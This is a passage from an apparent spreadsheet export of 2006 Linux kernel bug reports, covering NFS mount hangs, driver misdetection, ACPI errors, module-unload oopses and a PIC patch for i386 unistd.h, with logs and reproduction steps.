rw,noatime,intr,noauto 0 0 Problem Description: When trying to mount this share the mount process hangs several minutes, then it will display: "mount: 192.168.0.4:/portage: can't read superblock" The syslog will contain: "nfs: server 192.168.0.4 not responding, timed out" There is no firewall between the two systems, and the server does listen on port 2049. rpcinfo -p localhost on the server: program vers proto port 100000 2 tcp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 32769 status 100024 1 tcp 51226 status 100021 1 udp 32770 nlockmgr 100021 3 udp 32770 nlockmgr 100021 4 udp 32770 nlockmgr 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 100003 4 udp 2049 nfs 100021 1 tcp 39360 nlockmgr 100021 3 tcp 39360 nlockmgr 100021 4 tcp 39360 nlockmgr 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs 100003 4 tcp 2049 nfs 100005 1 udp 739 mountd 100005 1 tcp 742 mountd 100005 2 udp 739 mountd 100005 2 tcp 742 mountd 100005 3 udp 739 mountd 100005 3 tcp 742 mountd netstat --listen --inet contains these lines: tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN udp 0 0 0.0.0.0:2049 0.0.0.0:* Steps to reproduce: Export NFS: /var/export 192.168.0.2(fsid=0,rw,no_root_squash,sync) /var/export/portage 192.168.0.2(rw,nohide,no_root_squash,sync) Try to mount it via above fstab-line: mount /usr/portage</t>
  </si>
  <si>
    <t>sym2 still claims the 53C1510 integrated storage raid</t>
  </si>
  <si>
    <t>2006-10-06 18:34 UTC</t>
  </si>
  <si>
    <t>Yanko Kaneti</t>
  </si>
  <si>
    <t>2007-08-01 00:44 UTC</t>
  </si>
  <si>
    <t>In reference to http://bugs.debian.org/380272 about sym2 incorrectly claiming the integrated storage raid of some compaq servers instead leaving it to cpqarray. The fix thats already in the tree http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=b2b3c121076961333977f485f0d54c22121df920 is about PCI_DEVICE_ID_LSI_53C1510 0x000a but the bug report is about PCI_DEVICE_ID_NCR_53C1510 0x0010. I have one such compaq here and sym2 still claims it with the latest post 2.6.18 kernel tree. Perhaps the proper fix is to apply the same PCI_DEVICE_ID_LSI_53C1510 tweak to PCI_DEVICE_ID_NCR_53C1510</t>
  </si>
  <si>
    <t>Ruben Jenster</t>
  </si>
  <si>
    <t>cdrom capabilities wrong</t>
  </si>
  <si>
    <t>2006-10-08 09:19 UTC</t>
  </si>
  <si>
    <t>Johannes Berg</t>
  </si>
  <si>
    <t>2006-10-13 12:09 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18-rc6 Distribution: debian Hardware Environment: powerbook Software Environment: ? Problem Description: cdrom driver capabilities are wrong Steps to reproduce: cat /proc/sys/dev/cdrom/info 2.6.18-rc6 shows: CD-ROM information, Id: cdrom.c 3.20 2003/12/17 drive name: hdc drive speed: 24 drive # of slots: 1 Can close tray: 1 Can open tray: 1 Can lock tray: 1 Can change speed: 1 Can select disk: 0 Can read multisession: 1 Can read MCN: 1 Reports media changed: 1 Can play audio: 1 Can write CD-R: 1 Can write CD-RW: 1 Can read DVD: 1 Can write DVD-R: 1 Can write DVD-RAM: 0 Can read MRW: 1 Can write MRW: 1 Can write RAM: 1 while 2.6.18 shows: CD-ROM information, Id: cdrom.c 3.20 2003/12/17 drive name: hdc drive speed: 0 drive # of slots: 1 Can close tray: 0 Can open tray: 1 Can lock tray: 1 Can change speed: 1 Can select disk: 0 Can read multisession: 1 Can read MCN: 1 Reports media changed: 1 Can play audio: 0 Can write CD-R: 0 Can write CD-RW: 0 Can read DVD: 0 Can write DVD-R: 0 Can write DVD-RAM: 0 Can read MRW: 1 Can write MRW: 1 Can write RAM: 0 drive is a MATSHITADVD-R UJ-835E but that's about all the new kernel can tell me, older ones had more info which I can add if needed.</t>
  </si>
  <si>
    <t>acpi_processor-0742 [00] processor_preregister_: Error while parsing _PSD domain information. Assuming no coordination</t>
  </si>
  <si>
    <t>2006-10-08 13:57 UTC</t>
  </si>
  <si>
    <t>2007-03-08 00:56 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17.11 Distribution: Gentoo Hardware Environment: ASUS L3C/S laptop Software Environment: Problem Description: I googled out this has been reported in -mm kernel series, but that was some kernel panic. I don't get panic, the machine "works" but I have observed this message in the logs. acpi_processor-0742 [00] processor_preregister_: Error while parsing _PSD domain information. Assuming no coordination acpi-cpufreq: CPU0 - ACPI performance management activated. Steps to reproduce:</t>
  </si>
  <si>
    <t>INFO: possible recursive locking detected: mount/3232 is trying to acquire lock</t>
  </si>
  <si>
    <t>2006-10-08 14:02 UTC</t>
  </si>
  <si>
    <t>2007-11-18 15:29 UTC</t>
  </si>
  <si>
    <t>Dave Chinner</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17.11 Distribution: Gentoo Hardware Environment: ASUS L3C/S laptop Software Environment: Problem Description: The kernel has compiled in some bultin tests and so that's how I found the message in dmesg output Steps to reproduce:</t>
  </si>
  <si>
    <t>w83781d modprobing failure</t>
  </si>
  <si>
    <t>2006-10-09 13:45 UTC</t>
  </si>
  <si>
    <t>Sylvain BERTRAND</t>
  </si>
  <si>
    <t>2006-10-19 02:25 UTC</t>
  </si>
  <si>
    <t>#modprobe w83781d fails with "FATAL: Error inserting w83781d (/lib/modules/2.6.19-rc1/kernel/drivers/hwmon/w83781d.ko): Device or resource busy" error message and the messages log with some debug info follows. Works fine with 2.6.18. /var/log/messages Oct 9 22:51:23 zeus i2c-core: driver [w83781d] registered Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x20 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=40 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=40 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x21 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=42 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=42 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x22 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=44 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=44 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x23 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=46 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=46 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x24 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=48 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=48 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x25 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=4a DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=4a DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x26 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=4c DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=4c DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x27 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=4e DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=4e DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x28 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=50 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=50 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x29 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=52 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=52 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x2a Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=54 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=54 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x2b Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=56 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=56 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x2c Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=58 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=58 DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x2d Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=5a DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=5a DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=40 ADD=5b DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=08 CMD=40 ADD=5b DAT=01,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=08 CMD=4e ADD=5b DAT=01,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=08 CMD=4e ADD=5b DAT=80,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=08 CMD=4f ADD=5b DAT=80,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=08 CMD=4f ADD=5b DAT=12,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=08 CMD=4e ADD=5b DAT=12,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=08 CMD=4e ADD=5b DAT=80,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=08 CMD=4e ADD=5a DAT=80,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=08 CMD=4e ADD=5a DAT=80,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=08 CMD=4f ADD=5b DAT=80,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=08 CMD=4f ADD=5b DAT=12,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=08 CMD=58 ADD=5b DAT=12,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=08 CMD=58 ADD=5b DAT=31,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: client [as99127f] registered with bus id 0-002d Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=08 CMD=4a ADD=5b DAT=31,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=08 CMD=4a ADD=5b DAT=01,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: client [as99127f subclient] registered with bus id 0-0049 Oct 9 22:51:23 zeus i2c_adapter i2c-0: client [as99127f subclient] registered with bus id 0-0048 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=08 CMD=40 ADD=5b DAT=01,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=08 CMD=40 ADD=5b DAT=01,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=08 CMD=40 ADD=5a DAT=01,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=08 CMD=40 ADD=5a DAT=01,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=08 CMD=3b ADD=5b DAT=01,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=08 CMD=3b ADD=5b DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=08 CMD=3c ADD=5b DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=08 CMD=3c ADD=5b DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=08 CMD=3d ADD=5b DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=08 CMD=3d ADD=5b DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x2e Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=08 CMD=3d ADD=5c DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=5c DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: found normal entry for adapter 0, addr 0x2f Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (pre): STS=40 CNT=00 CMD=3d ADD=5e DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-0: Transaction (post): STS=00 CNT=00 CMD=3d ADD=5e DAT=ff,00 Oct 9 22:51:23 zeus i2c_adapter i2c-9191: Driver w83781d-isa registered Oct 9 22:51:23 zeus i2c_adapter i2c-9191: Request of region 0x290-0x297 for w83781d failed Oct 9 22:51:23 zeus i2c_adapter i2c-9191: Driver w83781d-isa failed to attach adapter, unregistering Oct 9 22:51:23 zeus i2c_adapter i2c-0: detaching client [as99127f] at 0x2d Oct 9 22:51:23 zeus i2c_adapter i2c-0: detaching client [as99127f subclient] at 0x49 Oct 9 22:51:23 zeus i2c_adapter i2c-0: detaching client [as99127f subclient] at 0x48 Oct 9 22:51:23 zeus i2c-core: driver [w83781d] unregistered</t>
  </si>
  <si>
    <t>modprobe -v -r causes crash in xt_unregister_match</t>
  </si>
  <si>
    <t>2.6.16 / 2.6.19-rc1-git6</t>
  </si>
  <si>
    <t>2006-10-10 04:58 UTC</t>
  </si>
  <si>
    <t>2008-07-22 00:17 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: untested Distribution: SuSE Linux Hardware Environment: IBM JS20 ppc64 Software Environment: Problem Description: NET: Unregistered protocol family 5 ieee80211_crypt: unregistered algorithm 'CCMP' ieee80211_crypt: unregistered algorithm 'WEP' ieee80211_crypt: unregistered algorithm 'NULL' Unable to handle kernel paging request for data at address 0xd000000000d57c08 Faulting instruction address: 0xd0000000000e667c Oops: Kernel access of bad area, sig: 11 [#1] SMP NR_CPUS=128 NUMA Modules linked in: ip_gre sco rfcomm hidp bnep l2cap bluetooth rpcsec_gss_spkm3 rpcsec_gss_krb5 auth_rpcgss sunrpc ebt_802_3 ebt_redirect ebt_snat ebt_mark ebtable_na t ebt_pkttype ebt_dnat ebt_among ebt_limit ebtable_filter ebt_ip ebt_arpreply ebt_stp ebt_log ebt_mark_m ebt_arp ebt_vlan ebtable_broute ebtables xt_NFQUEUE xt_CONNSE CMARK xt_statistic xt_policy xt_multiport xt_length bridge sctp ts_kmp dccp_ipv6 dccp_ipv4 dccp xt_pkttype ipt_LOG xt_limit autofs4 ip6t_REJECT xt_tcpudp ipt_REJECT x t_state iptable_filter ip_conntrack nfnetlink ip_tables ip6table_filter ip6_tables x_tables ipv6 loop dm_mod tg3 generic qla2xxx scsi_transport_fc firmware_class sd_m od scsi_mod NIP: D0000000000E667C LR: D0000000000E665C CTR: C000000000391EDC REGS: c0000000510db900 TRAP: 0300 Not tainted (2.6.19-rc1-git6-ppc64-netfilter) MSR: 8000000000009032 &lt;EE,ME,IR,DR&gt; CR: 24228282 XER: 200FFFFF DAR: D000000000D57C08, DSISR: 0000000042000000 TASK = c000000051b300c0[6162] 'modprobe' THREAD: c0000000510d8000 CPU: 0 GPR00: 0000000000100100 C0000000510DBB80 D0000000000F9518 C00000000F2FB0C0 GPR04: 0000000000000002 0000000000001EDB 0000000024228282 000000000170AB80 GPR08: 0000000000000000 0000000000200200 D000000000D72E70 D000000000D57C00 GPR12: D0000000000E7FF0 C00000000048D400 0000000000000000 0000000010020000 GPR16: 0000000000000001 0000000000000000 0000000000000000 0000000010028248 GPR20: 0000000000000000 00000000100283C8 0000000000000003 0000000010001B80 GPR24: 0000000000000001 0000000000000000 0000000010028B24 D0000000000F1528 GPR28: 00000000000000C0 D000000000D6C8B0 D0000000000F9080 0000000000000000 NIP [D0000000000E667C] .xt_unregister_match+0x5c/0xa0 [x_tables] LR [D0000000000E665C] .xt_unregister_match+0x3c/0xa0 [x_tables] Call Trace: [C0000000510DBB80] [D0000000000E665C] .xt_unregister_match+0x3c/0xa0 [x_tables] (unreliable) [C0000000510DBC20] [D0000000000E66EC] .xt_unregister_matches+0x2c/0x60 [x_tables] [C0000000510DBCB0] [D000000000D6C0A0] .xt_length_fini+0x20/0x38 [xt_length] [C0000000510DBD30] [C00000000008A6AC] .sys_delete_module+0x1f0/0x248 [C0000000510DBE30] [C00000000000871C] syscall_exit+0x0/0x40 Instruction dump: e87b0000 1f9c0060 7c7c1a14 48001999 e8410028 e95d0008 e97d0000 3c000010 3d200020 60000100 61290200 f96a0000 &lt;f94b0008&gt; f81d0000 f93d0008 60000000 Steps to reproduce: find /lib/modules/`uname -r`/kernel/net/ -name "*.ko" | xargs -n1 basename | sed 's@\.ko$@@' | xargs -n1 modprobe -v find /lib/modules/`uname -r`/kernel/net/ -name "*.ko" | xargs -n1 basename | sed 's@\.ko$@@' | xargs -n1 modprobe -v -r</t>
  </si>
  <si>
    <t>Module options 3c59x ignored with kmod enabled</t>
  </si>
  <si>
    <t>2006-10-10 06:09 UTC</t>
  </si>
  <si>
    <t>Klaas van den Berg</t>
  </si>
  <si>
    <t>2006-12-01 03:17 UTC</t>
  </si>
  <si>
    <t>PIC code in unistd.h</t>
  </si>
  <si>
    <t>2006-10-10 22:41 UTC</t>
  </si>
  <si>
    <t>Robert Connolly</t>
  </si>
  <si>
    <t>2007-06-06 00:25 UTC</t>
  </si>
  <si>
    <t>Linux kernel headers are not position independent. This is only an issue in userland. Several distributions are using position independent executables and libraries, via gcc -fpic/-fpie, and there is only one kernel library in i386 that poses an issue. I have inlined a patch which corrects the issue without affecting anything else. Please add it so there is one less patch against the Linux kernel: diff -Naur linux-2.6.18.orig/include/asm-i386/unistd.h linux-2.6.18/include/asm-i386/unistd.h --- linux-2.6.18.orig/include/asm-i386/unistd.h 2006-09-20 03:42:06.000000000 +0000 +++ linux-2.6.18/include/asm-i386/unistd.h 2006-10-11 05:32:17.000000000 +0000 @@ -352,6 +352,21 @@ __syscall_return(type,__res); \ } +#ifdef __PIC__ +#define _syscall1(type,name,type1,arg1) \ +type name(type1 arg1) \ +{ \ +long __res; \ +__asm__ volatile (\ + "pushl %%ebx\n\t" \ + "movl %2,%%ebx\n\t" \ + "int $0x80\n\t" \ + "popl %%ebx\n\t" \ + : "=a" (__res) \ + : "0" (__NR_##name),"r" ((long)(arg1))); \ +__syscall_return(type,__res); \ +} +#else #define _syscall1(type,name,type1,arg1) \ type name(type1 arg1) \ { \ @@ -361,7 +376,23 @@ : "0" (__NR_##name),"ri" ((long)(arg1)) : "memory"); \ __syscall_return(type,__res); \ } +#endif +#ifdef __PIC__ +#define _syscall2(type,name,type1,arg1,type2,arg2) \ +type name(type1 arg1,type2 arg2) \ +{ \ +long __res; \ +__asm__ volatile (\ + "pushl %%ebx\n\t" \ + "movl %2,%%ebx\n\t" \ + "int $0x80\n\t" \ + "popl %%ebx\n\t" \ + : "=a" (__res) \ + : "0" (__NR_##name),"r" ((long)(arg1)),"c" ((long)(arg2))); \ +__syscall_return(type,__res); \ +} +#else #define _syscall2(type,name,type1,arg1,type2,arg2) \ type name(type1 arg1,type2 arg2) \ { \ @@ -372,7 +403,24 @@ : "memory"); \ __syscall_return(type,__res); \ } +#endif +#ifdef __PIC__ +#define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \ +type name(type1 arg1,type2 arg2,type3 arg3) \ +{ \ +long __res; \ +__asm__ volatile (\ + "pushl %%ebx\n\t" \ + "movl %2,%%ebx\n\t" \ + "int $0x80\n\t" \ + "popl %%ebx\n\t" \ + : "=a" (__res) \ + : "0" (__NR_##name),"r" ((long)(arg1)),"c" ((long)(arg2)), \ + "d" ((long)(arg3))); \ +__syscall_return(type,__res); \ +} +#else #define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \ type name(type1 arg1,type2 arg2,type3 arg3) \ { \ @@ -383,7 +431,24 @@ "d" ((long)(arg3)) : "memory"); \ __syscall_return(type,__res); \ } +#endif +#ifdef __PIC__ +#define _syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \ +type name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \ +{ \ +long __res; \ +__asm__ volatile (\ + "pushl %%ebx\n\t" \ + "movl %2,%%ebx\n\t" \ + "int $0x80\n\t" \ + "popl %%ebx\n\t" \ + : "=a" (__res) \ + : "0" (__NR_##name),"r" ((long)(arg1)),"c" ((long)(arg2)), \ + "d" ((long)(arg3)),"S" ((long)(arg4))); \ +__syscall_return(type,__res); \ +} +#else #define _syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \ type name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \ { \ @@ -394,7 +459,25 @@ "d" ((long)(arg3)),"S" ((long)(arg4)) : "memory"); \ __syscall_return(type,__res); \ } +#endif +#ifdef __PIC__ +#define _syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \ + type5,arg5) \ +type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \ +{ \ +long __res; \ +__asm__ volatile (\ + "pushl %%ebx\n\t" \ + "movl %2,%%ebx\n\t" \ + "int $0x80\n\t" \ + "popl %%ebx\n\t" \ + : "=a" (__res) \ + : "0" (__NR_##name),"m" ((long)(arg1)),"c" ((long)(arg2)), \ + "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5))); \ +__syscall_return(type,__res); \ +} +#else #define _syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \ type5,arg5) \ type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \ @@ -408,7 +491,30 @@ : "memory"); \ __syscall_return(type,__res); \ } +#endif +#ifdef __PIC__ +#define _syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \ + type5,arg5,type6,arg6) \ +type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \ +{ \ +long __res; \ +__asm__ volatile (\ + "pushl %%ebp\n\t" \ + "movl %%eax,%%ebp\n\t" \ + "movl %1,%%eax\n\t" \ + "pushl %%ebx\n\t" \ + "movl %2,%%ebx\n\t" \ + "int $0x80\n\t" \ + "popl %%ebx\n\t" \ + "popl %%ebp\n\t" \ + : "=a" (__res) \ + : "i" (__NR_##name),"m" ((long)(arg1)),"c" ((long)(arg2)), \ + "d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)), \ + "0" ((long)(arg6))); \ +__syscall_return(type,__res); \ +} +#else #define _syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \ type5,arg5,type6,arg6) \ type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \ @@ -424,6 +530,7 @@ : "memory"); \ __syscall_return(type,__res); \ } +#endif #define __ARCH_WANT_IPC_PARSE_VERSION #define __ARCH_WANT_OLD_READDIR</t>
  </si>
  <si>
    <t>Dock driver: Scheduling while atomic BUG during docking.</t>
  </si>
  <si>
    <t>Linux fairlight 2.6.18-fairlight #1 PREEMPT Thu Sep 21 13:27:00</t>
  </si>
  <si>
    <t>2006-10-10 23:53 UTC</t>
  </si>
  <si>
    <t>2007-03-08 01:16 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Unstable Hardware Environment: Thinkpad T40p and ThinkPad Dock II Software Environment: ACPI dock driver from vanilla 2.6.18 Problem Description: If I dock my notebook to the dockingstation, I get the attached 'Scheduling while atomic BUG' in my dmesg. I can still work with this machine afterwards. Steps to reproduce: Dock the Thinkpad. I tested this with undocking first until now. If you like, I can boot the notebook outside the dock, dock it and see if it gives the same result.</t>
  </si>
  <si>
    <t>Yenta-socket causes oops on insertion of any PCMCIA card</t>
  </si>
  <si>
    <t>2006-10-11 07:17 UTC</t>
  </si>
  <si>
    <t>Jon Sharp</t>
  </si>
  <si>
    <t>2009-03-18 08:50 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.12 Distribution: Gentoo 2006.1 Hardware Environment: Apple PowerBook G3 (Lombard) Software Environment: Gentoo Linux 2006.1 (GCC 4.1.1) Problem Description: Machine panics with "Oops: ...machine check..." message on insertion of (also if card is already in slot on boot) any PCMCIA card with Yenta-socket driver, either as module, or compiled in. Failure appears to be caused by pcmcia_read_cis_mem call according to stacktrace. Steps to reproduce: Compile yenta-socket support either into kernel or as module and insert PCMCIA card.</t>
  </si>
  <si>
    <t>Kernel panics in acpi_processor_idle</t>
  </si>
  <si>
    <t>2006-10-11 21:08 UTC</t>
  </si>
  <si>
    <t>Frank Sorenson</t>
  </si>
  <si>
    <t>2006-10-12 17:45 UTC</t>
  </si>
  <si>
    <t>acpi_power-other</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18 Distribution: FC5 Hardware Environment: Dell Inspiron E1705 Core 2 Duo Software Environment: nothing special Problem Description: Kernel panics within a few minutes of boot Steps to reproduce: seems to happen on its own soon after booting, but occurs every time</t>
  </si>
  <si>
    <t>bcm203x kernel panic at boot</t>
  </si>
  <si>
    <t>all after 2.6.16</t>
  </si>
  <si>
    <t>2006-10-12 00:53 UTC</t>
  </si>
  <si>
    <t>Bal</t>
  </si>
  <si>
    <t>2006-10-19 00:41 UTC</t>
  </si>
  <si>
    <t>Marcel Holtmann</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian / sid Hardware Environment: x86 amd barton 3000+, abit nf7-s2g Problem Description: When I start my computer at the first boot it gives a panic http://perverztata.uw.hu/pict0019.jpg at the 2nd boot my usb keyboard isn't workinkg, http://perverztata.uw.hu/messages and at the 3rd boot is works well. If I unplug my bluetooth adapter there is no problem. It only happen with kernels after 2.6.16 (with 2.6.16 I had no problem) the output of the lsusb: http://perverztata.uw.hu/lsusb.txt To reproduce I only need to turn off the computer for a minute and it does the same.</t>
  </si>
  <si>
    <t>Kernel Oops and lockup when rebooting/shutting down</t>
  </si>
  <si>
    <t>CIFS</t>
  </si>
  <si>
    <t>2006-10-13 14:51 UTC</t>
  </si>
  <si>
    <t>2007-07-09 21:04 UTC</t>
  </si>
  <si>
    <t>fs_cifs</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17.XX Distribution: Debian Sid Hardware Environment: Dell Precision with HT Pentium 4 Software Environment: Debian Sid Problem Description: When rebooting/shutting down and some CIFS-Mounts are still active the kernel oops occurs. I see on the console a lot of kernel oops, but I was only able to take a foto of the last one. The kernel oopses are not logged :-( Steps to reproduce: I think the kernel oopses only occur when some CIFS-Mounts are still active. The server is a Win2003.</t>
  </si>
  <si>
    <t>2.6.19-rc2</t>
  </si>
  <si>
    <t>2.6.19-rc2 link error : undefined reference to `sys_epoll_pwait'</t>
  </si>
  <si>
    <t>2006-10-16 01:34 UTC</t>
  </si>
  <si>
    <t>2006-10-16 14:01 UTC</t>
  </si>
  <si>
    <t>2.6.19-rc1 compiled fine. From my .config: # CONFIG_EPOLL is not set</t>
  </si>
  <si>
    <t>cpufreq misbehaves if C3 and LAPIC and SMP</t>
  </si>
  <si>
    <t>2.6.18, 2.6.18.1, 2.6.19, 2.6.20</t>
  </si>
  <si>
    <t>2006-10-16 13:08 UTC</t>
  </si>
  <si>
